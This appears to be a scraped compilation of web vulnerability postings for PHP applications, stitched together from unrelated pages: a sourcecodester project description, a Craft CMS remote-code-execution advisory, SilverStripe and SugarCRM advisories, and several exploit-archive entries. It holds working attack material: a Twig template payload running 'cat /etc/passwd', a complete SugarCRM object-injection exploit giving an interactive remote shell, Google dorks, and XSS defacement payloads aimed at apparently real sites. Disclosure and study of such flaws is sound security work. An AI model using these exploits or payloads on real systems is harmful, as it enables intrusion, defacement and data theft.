Cross Site Scripting (XSS) vulnerability in sourcecodester Student Study Center Desk Management System 1.0 allows attackers to run arbitrary code via crafted GET request to web application URL.

Submitted by oretnom23 on Tuesday, March 14, 2023 - 15:32.

This project is entitled **Student Study Center Desk Management System**. It is a web-based application that was mainly developed using **PHP Language** and **MySQL Database**. The project's main purpose is to provide certain study center with a platform for managing the students' assigned or allocated desks. It has a pleasant user interface using **Bootstrap Framework** and **AdminLTE Template**. The project also contains multiple user-friendly features and functionalities.

****How does the Student Study Center Desk Management System?****

The Student Study Center Desk Management System is a project with one module which is the management site only that can be accessed by Administrator or Staff users. Here, the study center management can simply allocate or assign and unassign students to specific desks. The management is required to populate the list of students and list of the desk upon using the system for the first time. To manage the student desk allocation, management can simply redirect to the **"Assign"** page and select the student's name. Then, they can simply assign the student to a certain desk and manage the list of the history of the assigned records. This system also contains date-wise reports.

****What are the Features and Functionalities?****

The Student Study Center Desk Management System contains the following features and functionalities:

*   **Login and Logout**
*   **Dashboard Page**
*   **Student List Management**
*   **Desk List Management**
*   **Manage Student Desk Allocation**
*   **Generate Date-wise Reports**
*   **Manage System Users**
*   **Manage System Information**
*   **Update Account Details**

****What are the Technologies used?****

Here are the technologies that I used to develop this **Student Study Center Desk Management System**:

*   **XAMPP**
*   **VS Code Editor**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **jQuery**
*   **Ajax**
*   **DataTables Library**
*   **Select2 Library**
*   **Bootstrap Framework**
*   **AdminLTE Template**
*   **Fontawesome Icons**

****Snapshots********Dashboard****

****Student List****

****Desk List****

****Student Assign/Unassigned Records****

****Reports****

The **Students Study Center Desk Management System** project source code zip file is provided on this website and it is free to download. The project was mainly developed for educational purposes only. Feel free to download and modify the project source code to meet your own requirements.

****How to Run?****

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** named ****sscdms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****sscdms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Student Study Center Desk Management System** in a **browser**. i.e. ****http://localhost/php-sscdms/****.

****Default Admin Access****

Username: **admin**  
Password: **admin123**

****DEMO VIDEO****

That's it! I hope this **Student Study Center Desk Management System using PHP (OOP) and MySQL DB Free Source Code Project** will help you with what you are looking for and that you'll find something useful for your current and future PHP Projects.

Explore more on this website for more **Tutorials** and **Free Source Codes**.

****Enjoy =)****

*   4512 views

CVE-2023-36317: Student Study Center Desk Management System using PHP (OOP) and MySQL DB Free Source Code

Craft is a CMS for creating custom digital experiences on the web and beyond. Bypassing the validatePath function can lead to potential remote code execution. This vulnerability can lead to malicious control of vulnerable systems and data exfiltrations. Although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution). This issue has been patched in version 4.4.15 and version 3.8.15.


**Package**

**Affected versions**

\>= 4.0.0-RC1, <= 4.4.14

\>= 3.0.0, <= 3.8.14

**Patched versions**

4.4.15

3.8.15

**Summary**

Bypassing the validatePath function can lead to potential Remote Code Execution 
(Post-authentication, ALLOW\_ADMIN\_CHANGES=true)

**Details**

In bootstrap.php, the SystemPaths path is set as below.

// Set the vendor path. By default assume that it's 4 levels up from here
$vendorPath = $findConfigPath('--vendorPath', 'CRAFT\_VENDOR\_PATH') ?? dirname(\_\_DIR\_\_, 3);

// Set the "project root" path that contains config/, storage/, etc. By default assume that it's up a level from vendor/.
$rootPath = $findConfigPath('--basePath', 'CRAFT\_BASE\_PATH') ?? dirname($vendorPath);

// By default the remaining directories will be in the base directory
$dotenvPath = $findConfigPath('--dotenvPath', 'CRAFT\_DOTENV\_PATH') ?? "$rootPath/.env";
$configPath = $findConfigPath('--configPath', 'CRAFT\_CONFIG\_PATH') ?? "$rootPath/config";
$contentMigrationsPath = $findConfigPath('--contentMigrationsPath', 'CRAFT\_CONTENT\_MIGRATIONS\_PATH') ?? "$rootPath/migrations";
$storagePath = $findConfigPath('--storagePath', 'CRAFT\_STORAGE\_PATH') ?? "$rootPath/storage";
$templatesPath = $findConfigPath('--templatesPath', 'CRAFT\_TEMPLATES\_PATH') ?? "$rootPath/templates";
$translationsPath = $findConfigPath('--translationsPath', 'CRAFT\_TRANSLATIONS\_PATH') ?? "$rootPath/translations";
$testsPath = $findConfigPath('--testsPath', 'CRAFT\_TESTS\_PATH') ?? "$rootPath/tests";

Because paths are validated based on the /path1/path2 format, this can be bypassed using a file URI scheme such as file:///path1/path2. File scheme is supported in mkdir()

 /\*\*
 \* @param string $attribute
 \* @param array|null $params
 \* @param InlineValidator $validator
 \* @return void
 \* @since 4.4.6
 \*/
 public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void
 {
 // Make sure it’s not within any of the system directories
 $path = FileHelper::absolutePath($this\->getRootPath(), '/');

 $systemDirs = Craft::$app\->getPath()->getSystemPaths();

 foreach ($systemDirs as $dir) {
 $dir = FileHelper::absolutePath($dir, '/');
 if (str\_starts\_with("$path/", "$dir/")) {
 $validator\->addError($this, $attribute, Craft::t('app', 'Local volumes cannot be located within system directories.'));
 break;
 }
 }
 }

ref. https://www.php.net/manual/en/wrappers.file.php

**PoC**

1. Create a new filesystem. **Base Path: file:///var/www/html/templates**

2. Create a new asset volume. Asset Filesystem: local\_bypass

3. Upload a ttml file with rce template code. Confirm poc.ttml file created in /var/www/html/templates

{{'<pre>'}}
{{1337\*1337}}
{{\['cat /etc/passwd'\]|map('passthru')|join}}
{{\['id;pwd;ls -altr /'\]|map('passthru')|join}}

 

4. Create a new route. URI: \* , Template: poc.ttml

5. Confirm RCE on arbitrary path ( /\* )

**PoC Env**

**Impact**

Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.

although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW\_ADMIN\_CHANGES=true, there is still a potential security threat (Remote Code Execution)

CVE-2023-40035: Remote Code Execution via validatePath bypass

TinyMCE 4.x is vulnerable to several XSS vectors, which had been patched in later versions. Two of these have been identified as affecting silverstripe/admin.

Only Silverstripe CMS 4 is affected by these vulnerabilities. It's not possible to upgrade Silverstripe CMS 4 to use a more recent release of TinyMCE without introducing breaking changes. Instead, the security patches that shipped in later releases of TinyMCE have been backported to the TinyMCE version bundled in silverstripe/admin.

Silverstripe CMS 5 is not affected by these vulnerabilities because it uses TinyMCE 6.

**Package**

composer silverstripe/admin (Composer)

**Affected versions**

\>= 1.0.0, < 1.13.6

**Patched versions**

1.13.6

**Description**

TinyMCE 4.x is vulnerable to several XSS vectors, which had been patched in later versions. Two of these have been identified as affecting silverstripe/admin.

Only Silverstripe CMS 4 is affected by these vulnerabilities. It's not possible to upgrade Silverstripe CMS 4 to use a more recent release of TinyMCE without introducing breaking changes. Instead, the security patches that shipped in later releases of TinyMCE have been backported to the TinyMCE version bundled in silverstripe/admin.

Silverstripe CMS 5 is not affected by these vulnerabilities because it uses TinyMCE 6.

**References**

* https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/admin/SS-2023-002.yaml
* https://www.silverstripe.org/download/security-releases/SS-2023-002

Published to the GitHub Advisory Database

Aug 23, 2023

Reviewed

Aug 23, 2023

GHSA-jxcx-3h54-qqxx: SilverStripe CMS Cross-site Scripting vulnerabilities inherited from TinyMCE

SugarCRM versions 12.2.0 and below suffer from multiple remote SQL injection vulnerabilities.

---------------------------------------------------- 
SugarCRM <= 12.2.0 Two SQL Injection Vulnerabilities 
----------------------------------------------------

[-] Software Link:

https://www.sugarcrm.com

[-] Affected Versions:

Version 12.2.0 and prior versions. 
Version 12.0.2 and prior versions. 
Version 11.0.5 and prior versions.

[-] Vulnerabilities Description:

1) User input passed through the “metrics” parameter to the 
“/Forecasts/metrics” 
REST API endpoint is not properly sanitized before being used to 
construct a SQL 
query. This can be exploited by malicious users to e.g. read sensitive 
data from 
the database through in-band SQL Injection attacks.

2) User input passed through the “placeholder_fields” parameter to the 
e.g. 
“/Notes/{recordID}/link/history” REST API endpoint is not properly 
sanitized before 
being used to construct a SQL query. This can be exploited by malicious 
users to 
e.g. read sensitive data from the database through in-band SQL Injection 
attacks.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2023-35811_1.php 
https://karmainsecurity.com/pocs/CVE-2023-35811_2.php

[-] Solution:

Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.

[-] Disclosure Timeline:

[14/02/2023] - Vendor notified 
[12/04/2023] - Fixed versions released 
[17/06/2023] - CVE number assigned 
[23/08/2023] - Publication of this advisory

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) 
has assigned the name CVE-2023-35811 to these vulnerabilities.

[-] Credits:

Vulnerabilities discovered by Egidio Romano.

[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-08

[-] Other References:

https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-008/

SugarCRM 12.2.0 SQL Injection

SugarCRM versions 12.2.0 and below suffer from a PHP object injection vulnerability.

-------------------------------------------------------------------------------SugarCRM <= 12.2.0 (Docusign_GlobalSettings) PHP Object Injection Vulnerability-------------------------------------------------------------------------------[-] Software Link:https://www.sugarcrm.com[-] Affected Versions:Version 12.2.0 and prior versions.Version 12.0.2 and prior versions.Version 11.0.5 and prior versions.[-] Vulnerability Description:There is a Second-Order PHP Object Injection vulnerability which might allow maliciousadmin users to execute arbitrary PHP code on the web server (RCE) by storing maliciousserialized objects into the database.The vulnerability can be triggered by invoking the "/DocuSign/getGlobalConfig" REST APIendpoint, which is using the unserialize() PHP function with the "Docusign_GlobalSettings"parameter. This can be exploited to inject arbitrary PHP objects into the applicationscope, allowing an attacker to perform a variety of attacks.[-] Proof of Concept:https://karmainsecurity.com/pocs/CVE-2023-35810.php[Packet Storm Note: see below][-] Solution:Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.[-] Disclosure Timeline:[14/02/2023] - Vendor notified[12/04/2023] - Fixed versions released[17/06/2023] - CVE number assigned[23/08/2023] - Publication of this advisory[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-35810 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:https://karmainsecurity.com/KIS-2023-07[-] Other References:https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-009/---- poc ----<?phpset_time_limit(0);error_reporting(E_ERROR);if (!extension_loaded("curl")) die("[-] cURL extension required!\n");if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");include("chain.php");function inject_pop_chain($cmd){ global $ch, $url; $pop = new \Monolog\Handler\BufferHandler(["current", "system"], [$cmd, "level" => null]); $pop = new \Monolog\Handler\SyslogUdpHandler($pop); $pop = base64_encode(serialize($pop)); curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign"); curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":"'.$pop.'"}'); curl_exec($ch);}list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];print "[+] Logging in with username '{$user}' and password '{$pass}'\n";$ch = curl_init();$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/oauth2/token");curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);print "[+] Launching shell\n";while(1){ print "\nsugar-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; inject_pop_chain($cmd); curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/DocuSign/getGlobalConfig"); curl_setopt($ch, CURLOPT_POST, false); preg_match("/(.+)/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");}// cleaningcurl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign");curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":""}');curl_exec($ch);

SugarCRM 12.2.0 PHP Object Injection

SugarCRM versions 12.2.0 and below suffers from a multiple step remote shell upload vulnerability.

-----------------------------------------------------------------SugarCRM <= 12.2.0 (Notes) Unrestricted File Upload Vulnerability-----------------------------------------------------------------[-] Software Link:https://www.sugarcrm.com[-] Affected Versions:Version 12.2.0 and prior versions.Version 12.0.2 and prior versions.Version 11.0.5 and prior versions.[-] Vulnerability Description:When handling the "save" action within the "Notes" module the application allows uploadingof any kind of file into the /upload/ directory. This one is protected by the main SugarCRM.htaccess file, i.e. it doesn't allow access/execution for PHP files. However, this behaviourcan be overridden if a subdirectory contains another .htaccess file. So, an attacker canleverage the vulnerability to firstly upload a new .htaccess file and then to upload thePHP code they want to execute.[-] Proof of Concept:https://karmainsecurity.com/pocs/CVE-2023-35808.php[-] Solution:Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.[-] Disclosure Timeline:[14/02/2023] - Vendor notified[12/04/2023] - Fixed versions released[17/06/2023] - CVE number assigned[23/08/2023] - Publication of this advisory[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-35808 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-05[-] Other References:https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-006/

SugarCRM 12.2.0 Shell Upload

GEN Security+ version 4.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : GEN Security+ v4.0 Sql Injection Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.ptcpay.com/                                                                                            || # Dork      : Powered by GeN4 Security+ 2.0                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] http://127.0.0.1/GEN/forum/main_forum.php?cat=1 (inject her)[+] login : http://127.0.0.1/GEN/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

GEN Security+ 4.0 SQL Injection

Geeklog version 2.1.0b1 suffers from a database disclosure vulnerability.

    ====================================================================================================================================| # Title     : Geeklog v2.1.0b1 database disclosure Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.geeklog.net/                                                                                            || # Dork      : Powered by Geeklog                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Suffers from a database disclosure vulnerability Allow visitors to know the site manager information .[+] Use Payload : /admin/install/configinfo.php[+] http://127.0.0.1/public_html/admin/install/configinfo.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Geeklog 2.1.0b1 Database Disclosure

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

**G And G Corporate CMS 1.0 Cross Site Scripting**

Posted Aug 23, 2023

Authored by indoushka

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ec7e6459653c2e6f1683c120c47e58e61d870a911a466497ef2ef99455a30669

Download | Favorite | View

**G And G Corporate CMS 1.0 Cross Site Scripting**

 ====================================================================================================================================| # Title : G&G Corporate CMS v1.0 XSS Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | | # Vendor : http://gegweb.it | | # Dork : intext:Powered by Studio G&G Corporate Communication site:it |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /prodotti.php?LANG=2&id=prodotti&CAT=1'<marquee>Hacked by indoushka</marquee>[+] http://priolinoxit/prodotti.php?LANG=2&id=prodotti&CAT=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

* ActiveX (932)
* Advisory (82,006)
* Arbitrary (16,212)
* BBS (2,859)
* Bypass (1,740)
* CGI (1,026)
* Code Execution (7,282)
* Conference (679)
* Cracker (841)
* CSRF (3,347)
* DoS (23,453)
* Encryption (2,370)
* Exploit (51,952)
* File Inclusion (4,222)
* File Upload (976)
* Firewall (821)
* Info Disclosure (2,785)
* Intrusion Detection (892)
* Java (3,045)
* JavaScript (859)
* Kernel (6,681)
* Local (14,456)
* Magazine (586)
* Overflow (12,693)
* Perl (1,423)
* PHP (5,147)
* Proof of Concept (2,338)
* Protocol (3,602)
* Python (1,535)
* Remote (30,799)
* Root (3,587)
* Rootkit (508)
* Ruby (612)
* Scanner (1,640)
* Security Tool (7,888)
* Shell (3,186)
* Shellcode (1,215)
* Sniffer (894)
* Spoof (2,207)
* SQL Injection (16,383)
* TCP (2,406)
* Trojan (687)
* UDP (893)
* Virus (665)
* Vulnerability (31,788)
* Web (9,670)
* Whitepaper (3,750)
* x86 (962)
* XSS (17,953)
* Other

**File Archives**

* August 2023
* July 2023
* June 2023
* May 2023
* April 2023
* March 2023
* February 2023
* January 2023
* December 2022
* November 2022
* October 2022
* September 2022
* Older

**Systems**

* AIX (428)
* Apple (2,002)
* BSD (373)
* CentOS (57)
* Cisco (1,925)
* Debian (6,819)
* Fedora (1,692)
* FreeBSD (1,244)
* Gentoo (4,322)
* HPUX (879)
* iOS (351)
* iPhone (108)
* IRIX (220)
* Juniper (67)
* Linux (46,504)
* Mac OS X (686)
* Mandriva (3,105)
* NetBSD (256)
* OpenBSD (485)
* RedHat (13,750)
* Slackware (941)
* Solaris (1,610)
* SUSE (1,444)
* Ubuntu (8,835)
* UNIX (9,291)
* UnixWare (186)
* Windows (6,574)
* Other

G And G Corporate CMS 1.0 Cross Site Scripting

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

**FreshRSS 1.11.1 HTML Injection**

Posted Aug 23, 2023

Authored by indoushka

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

tags | exploit

SHA-256 | c789b4001ff7c396e22af1e82b8f9c8c3a4f13f593828eb66d0a73226d79294b

Download | Favorite | View

**FreshRSS 1.11.1 HTML Injection**

 ====================================================================================================================================| # Title : FreshRSS v1.11.1 Html Inject Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) || # Vendor : https://freshrss.org/ |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : <marquee>Hacked by indoushka</marquee>[+] https://demo127.0.0.1/freshrssorg/i/?c=<marquee>Hacked by indoushka</marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================

**File Tags**

* ActiveX (932)
* Advisory (82,006)
* Arbitrary (16,212)
* BBS (2,859)
* Bypass (1,740)
* CGI (1,026)
* Code Execution (7,282)
* Conference (679)
* Cracker (841)
* CSRF (3,347)
* DoS (23,453)
* Encryption (2,370)
* Exploit (51,952)
* File Inclusion (4,222)
* File Upload (976)
* Firewall (821)
* Info Disclosure (2,785)
* Intrusion Detection (892)
* Java (3,045)
* JavaScript (859)
* Kernel (6,681)
* Local (14,456)
* Magazine (586)
* Overflow (12,693)
* Perl (1,423)
* PHP (5,147)
* Proof of Concept (2,338)
* Protocol (3,602)
* Python (1,535)
* Remote (30,799)
* Root (3,587)
* Rootkit (508)
* Ruby (612)
* Scanner (1,640)
* Security Tool (7,888)
* Shell (3,186)
* Shellcode (1,215)
* Sniffer (894)
* Spoof (2,207)
* SQL Injection (16,383)
* TCP (2,406)
* Trojan (687)
* UDP (893)
* Virus (665)
* Vulnerability (31,788)
* Web (9,670)
* Whitepaper (3,750)
* x86 (962)
* XSS (17,953)
* Other

**File Archives**

* August 2023
* July 2023
* June 2023
* May 2023
* April 2023
* March 2023
* February 2023
* January 2023
* December 2022
* November 2022
* October 2022
* September 2022
* Older

**Systems**

* AIX (428)
* Apple (2,002)
* BSD (373)
* CentOS (57)
* Cisco (1,925)
* Debian (6,819)
* Fedora (1,692)
* FreeBSD (1,244)
* Gentoo (4,322)
* HPUX (879)
* iOS (351)
* iPhone (108)
* IRIX (220)
* Juniper (67)
* Linux (46,504)
* Mac OS X (686)
* Mandriva (3,105)
* NetBSD (256)
* OpenBSD (485)
* RedHat (13,750)
* Slackware (941)
* Solaris (1,610)
* SUSE (1,444)
* Ubuntu (8,835)
* UNIX (9,291)
* UnixWare (186)
* Windows (6,574)
* Other

Tag

#php